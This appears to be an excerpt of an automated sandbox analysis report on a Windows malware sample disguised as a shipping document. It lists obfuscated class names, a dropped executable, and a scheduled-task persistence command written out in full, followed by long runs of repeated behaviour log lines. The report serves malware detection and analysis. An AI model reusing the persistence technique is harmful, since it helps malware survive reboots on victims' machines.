Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, DYR5mgvByZ5AqfKXPJ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IOawsaFIyF', 'dLHwrlw9GX', 'jhkwzZ79BX', 'pvZ2ij9qDD', 'Y3a2cKeTVs', 'Xfr2wiwFM7', 'tmq22OPiPx', 'iNcxj3x8AScqIKwUgyl'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, LecK7pRFDoRvlOpnsK.cs	High entropy of concatenated method names: 'EaocOyFcKG', 'utCcMppqGG', 'q1Ic4QjMgJ', 'T9XcApfynF', 'xZvcYVgrFl', 'Sc9cVRLodg', 'FW9Lm9IobJ7wAFaKKq', 'x48a31vlaHMCGDKOEn', 'iy3ccHRZar', 'UkJc2xqDNq'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, MVTp3tHWwbTqXbrBQ6.cs	High entropy of concatenated method names: 'ToString', 'gRkVpTPjyW', 'H3AVShmVJT', 'NL2VnhFcHT', 'mXVVZIXHgT', 'P8SVd89hXI', 'mADV1PDrng', 'MaVVCj4Nhe', 'M8yVakO6IR', 'GepVlEXhjZ'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, synFdbUAAYG4FXZvVg.cs	High entropy of concatenated method names: 'TML0TZOIXD', 'c8a0BauMu1', 'eEEvnYUwhi', 'g7bvZwoxMm', 'AqYvdEj7Uw', 'nXDv1gokyc', 'axTvC3nNSB', 'J1yvaHU9xI', 'XeCvlV2tbP', 'M7dvqtrdxt'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, WKGKBnxuD29SR6iMy0.cs	High entropy of concatenated method names: 'glFWge1w8H', 'TRcW6DDgEM', 'noyWFGFMuG', 'iv0WSoYFoi', 'o5eWZM7tDq', 'RNBWdHHhej', 'V81WCojX8U', 'pZsWanDcfL', 'nbIWqRBHaV', 'v6tWpRcuPP'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, p5ajujJIx6NEAP6Ta6.cs	High entropy of concatenated method names: 'rkqb4IoryD', 'eYfbA31FKt', 'ToString', 's7jbkeyra9', 'tDUbhuPWCQ', 'UrAbvd7bWf', 'k3jb01NNMp', 'KqWbov5uyA', 'z8KbOqKPJx', 'hpJbMsvIPM'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, AIcHRChuVALeienrmr.cs	High entropy of concatenated method names: 'Dispose', 'uuDcstGlte', 'p9VwSZhBfN', 'EMSFr8Cs7e', 'iw1cr5n7Yf', 'BCUczaaFyU', 'ProcessDialogKey', 'iQrwiDRIHl', 'zNrwcKQTNf', 'tK1wwrqKBt'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, yWdfM2w0nSc2dxPWqK.cs	High entropy of concatenated method names: 'jH2mNUWV9', 'RBDekMWaE', 'F23jSWmO9', 'zdqBaT7H4', 'WE06gIB6L', 'iPSUWXgfm', 'OB4pjO0apGFRSAGWu9', 'cdhHjmmAfronYpLDBj', 'uofEWCHUe', 'Wweug1gSt'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, YqKBtUr6skMlv0JZ6D.cs	High entropy of concatenated method names: 'gafuvwvXpo', 'pZeu0Y1LQF', 'QlSuoVcxLn', 'LoJuO9aeKk', 'ldcufHJLfP', 'py3uMmnr1y', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, It8BTICMxJrvOAxTA5.cs	High entropy of concatenated method names: 'TCxOk5mtC5', 'rdAOvhfFwE', 'chEOopyvyJ', 'xWXort2OLP', 'di9oztZTme', 'RLdOitjrMN', 'WlYOcK2PjC', 'acVOwZ6L9G', 'JjgO2Rq589', 'dDDORYwps7'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, GW9cD1MmeOsIOgrcql.cs	High entropy of concatenated method names: 'st22GFDoKU', 'YQ82kis2ir', 'ytg2hjIxyL', 'Xle2vSVIHM', 'X9W20Hie0N', 'vtT2ourvjS', 'R8G2Oupr11', 'qbQ2MdETRm', 'dAD28S8tNQ', 'bMj24aepcC'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, KU8ZYEciwjsgRZYTR88.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'S19up8nqxo', 'k0quPk3Ixw', 'kDTuxxkV9V', 'jIiuKKTlZ3', 'wI4uLhDZ9e', 'Q83uHS5wg2', 'W9CuJev2TD'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, MXmGpj5MV9uDtGlteo.cs	High entropy of concatenated method names: 'VoDfYLYPCD', 'evufbPvr8E', 'iSIff3pPaQ', 'MvCfDNBSRe', 'kZ6f7PcM7N', 'yo8fQ4tb5c', 'Dispose', 'nkGEkKOOUf', 'BTLEhaxZxd', 'siyEvBejXP'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, iyFcKGg9tCppqGG5IB.cs	High entropy of concatenated method names: 'YPYhKoeWJX', 'C3xhL0k6ZA', 'PnZhHZaXrM', 'dMkhJooWLH', 'INmh3Xo95l', 'vLehIe3asP', 'P82h5mjbhW', 'cvxhNXbHvi', 'CX6hsOPlfk', 'miqhrr6hbZ'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, MoqyMhKfR5ZLSgV4xq.cs	High entropy of concatenated method names: 'GDIYqhjdbs', 'iBAYPYG5MT', 'CNZYKdlmr9', 'tmOYLDYbpw', 'X7RYSwAxUA', 'MPHYnJcbq7', 'I3RYZKBBcQ', 'nPvYdXyHFq', 'WZKY1BaUYO', 'rOnYCQLft6'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, YFlHc9FRLodglFhil2.cs	High entropy of concatenated method names: 'CfHoGKJPAp', 'Is2ohx9NjZ', 'YSYo0cBv0r', 'zanoOfxncP', 'vbuoMJn2jp', 'b8b03iXl7I', 'Lpt0IwjhPk', 'lY905vtxKg', 'KFm0NknFcH', 'wNA0sJeaKM'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, Ft1xorcR9nfR3PLHEV2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PpY9fyOqZC', 'reo9u2y3Vp', 'c2R9DhsbFm', 'iSn99eAKWn', 'O1997qWdU8', 'OlP9tXJDZa', 'm3T9Qn6Wyb'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, LTQ4HuccTwyWsx1plV0.cs	High entropy of concatenated method names: 'KapureQ5qN', 'B5auzAZFtv', 'Es1Di1Mf3e', 'S01DcEYaVL', 'WyIDwYYTrL', 'lxPD2ZcUZE', 'BfhDRydOMO', 'H3JDGyQiIk', 'YU6DkfTK7u', 'wygDhwDQHj'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, Tkt4wHlmAKfXdWtNJ2.cs	High entropy of concatenated method names: 'pFsOXCkO2M', 'kvdOyVleBR', 'sucOmc6y86', 'SJROedhrAF', 'RwqOT9kFio', 'aEVOjQrC0X', 'lFpOB0SH6O', 'OryOgUGw3s', 'lFrO6x3DB7', 'CvlOUyBWIb'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, hhLLZuzZxj1m3Zu6xC.cs	High entropy of concatenated method names: 'OBAujm0FlY', 'XdUugdZTyd', 'U12u6HGa6n', 'NdmuFWyiDv', 'XgkuS1Gl0C', 'XGvuZ3H4pw', 'go1ud6txl9', 'A6guQkOSZt', 'tZYuXRHFjo', 'hFAuyGth4v'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, ej4Qr1IUJDvF9DuJ0E.cs	High entropy of concatenated method names: 'iL6bNRoADV', 'X26br5ieKL', 'MjjEi151OW', 'OpUEcNC4yP', 'kJ9bpKkIFm', 'KJnbP6PIu7', 'y3YbxrBuXJ', 'bwtbKpOjah', 'IRobLuBiWs', 'vsrbHUIk72'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, YDRIHlsmNrKQTNfDK1.cs	High entropy of concatenated method names: 'gg9fFTiwm7', 'VoifSbhf42', 'Ceyfns06jS', 'irPfZvtvK4', 'vcafdZPacO', 'N3Jf1NmZOn', 'yEvfCd7IYd', 'dBDfaliCra', 'H7LfllbkJq', 'tpGfqEZFKn'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, CX40lb61IQjMgJJ9Xp.cs	High entropy of concatenated method names: 'xMWvee6ruB', 'bZxvjSb03C', 'UxfvgNu6Gx', 'pvfv6lyDuv', 'HksvYYxiNC', 'PJivVbfkA5', 'HG4vbwM19g', 'IUAvE1jlDM', 'C0kvfGVI7n', 'ORFvuhxk0G'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, DYR5mgvByZ5AqfKXPJ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IOawsaFIyF', 'dLHwrlw9GX', 'jhkwzZ79BX', 'pvZ2ij9qDD', 'Y3a2cKeTVs', 'Xfr2wiwFM7', 'tmq22OPiPx', 'iNcxj3x8AScqIKwUgyl'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, LecK7pRFDoRvlOpnsK.cs	High entropy of concatenated method names: 'EaocOyFcKG', 'utCcMppqGG', 'q1Ic4QjMgJ', 'T9XcApfynF', 'xZvcYVgrFl', 'Sc9cVRLodg', 'FW9Lm9IobJ7wAFaKKq', 'x48a31vlaHMCGDKOEn', 'iy3ccHRZar', 'UkJc2xqDNq'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, MVTp3tHWwbTqXbrBQ6.cs	High entropy of concatenated method names: 'ToString', 'gRkVpTPjyW', 'H3AVShmVJT', 'NL2VnhFcHT', 'mXVVZIXHgT', 'P8SVd89hXI', 'mADV1PDrng', 'MaVVCj4Nhe', 'M8yVakO6IR', 'GepVlEXhjZ'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, synFdbUAAYG4FXZvVg.cs	High entropy of concatenated method names: 'TML0TZOIXD', 'c8a0BauMu1', 'eEEvnYUwhi', 'g7bvZwoxMm', 'AqYvdEj7Uw', 'nXDv1gokyc', 'axTvC3nNSB', 'J1yvaHU9xI', 'XeCvlV2tbP', 'M7dvqtrdxt'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, WKGKBnxuD29SR6iMy0.cs	High entropy of concatenated method names: 'glFWge1w8H', 'TRcW6DDgEM', 'noyWFGFMuG', 'iv0WSoYFoi', 'o5eWZM7tDq', 'RNBWdHHhej', 'V81WCojX8U', 'pZsWanDcfL', 'nbIWqRBHaV', 'v6tWpRcuPP'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, p5ajujJIx6NEAP6Ta6.cs	High entropy of concatenated method names: 'rkqb4IoryD', 'eYfbA31FKt', 'ToString', 's7jbkeyra9', 'tDUbhuPWCQ', 'UrAbvd7bWf', 'k3jb01NNMp', 'KqWbov5uyA', 'z8KbOqKPJx', 'hpJbMsvIPM'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, AIcHRChuVALeienrmr.cs	High entropy of concatenated method names: 'Dispose', 'uuDcstGlte', 'p9VwSZhBfN', 'EMSFr8Cs7e', 'iw1cr5n7Yf', 'BCUczaaFyU', 'ProcessDialogKey', 'iQrwiDRIHl', 'zNrwcKQTNf', 'tK1wwrqKBt'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, yWdfM2w0nSc2dxPWqK.cs	High entropy of concatenated method names: 'jH2mNUWV9', 'RBDekMWaE', 'F23jSWmO9', 'zdqBaT7H4', 'WE06gIB6L', 'iPSUWXgfm', 'OB4pjO0apGFRSAGWu9', 'cdhHjmmAfronYpLDBj', 'uofEWCHUe', 'Wweug1gSt'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, YqKBtUr6skMlv0JZ6D.cs	High entropy of concatenated method names: 'gafuvwvXpo', 'pZeu0Y1LQF', 'QlSuoVcxLn', 'LoJuO9aeKk', 'ldcufHJLfP', 'py3uMmnr1y', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, It8BTICMxJrvOAxTA5.cs	High entropy of concatenated method names: 'TCxOk5mtC5', 'rdAOvhfFwE', 'chEOopyvyJ', 'xWXort2OLP', 'di9oztZTme', 'RLdOitjrMN', 'WlYOcK2PjC', 'acVOwZ6L9G', 'JjgO2Rq589', 'dDDORYwps7'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, GW9cD1MmeOsIOgrcql.cs	High entropy of concatenated method names: 'st22GFDoKU', 'YQ82kis2ir', 'ytg2hjIxyL', 'Xle2vSVIHM', 'X9W20Hie0N', 'vtT2ourvjS', 'R8G2Oupr11', 'qbQ2MdETRm', 'dAD28S8tNQ', 'bMj24aepcC'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, KU8ZYEciwjsgRZYTR88.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'S19up8nqxo', 'k0quPk3Ixw', 'kDTuxxkV9V', 'jIiuKKTlZ3', 'wI4uLhDZ9e', 'Q83uHS5wg2', 'W9CuJev2TD'
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, MXmGpj5MV9uDtGlteo.cs	High entropy of concatenated method names: 'VoDfYLYPCD', 'evufbPvr8E', 'iSIff3pPaQ', 'MvCfDNBSRe', 'kZ6f7PcM7N', 'yo8fQ4tb5c', 'Dispose', 'nkGEkKOOUf', 'BTLEhaxZxd', 'siyEvBejXP'

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

File created: C:\Users\user\AppData\Roaming\uyDicX.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
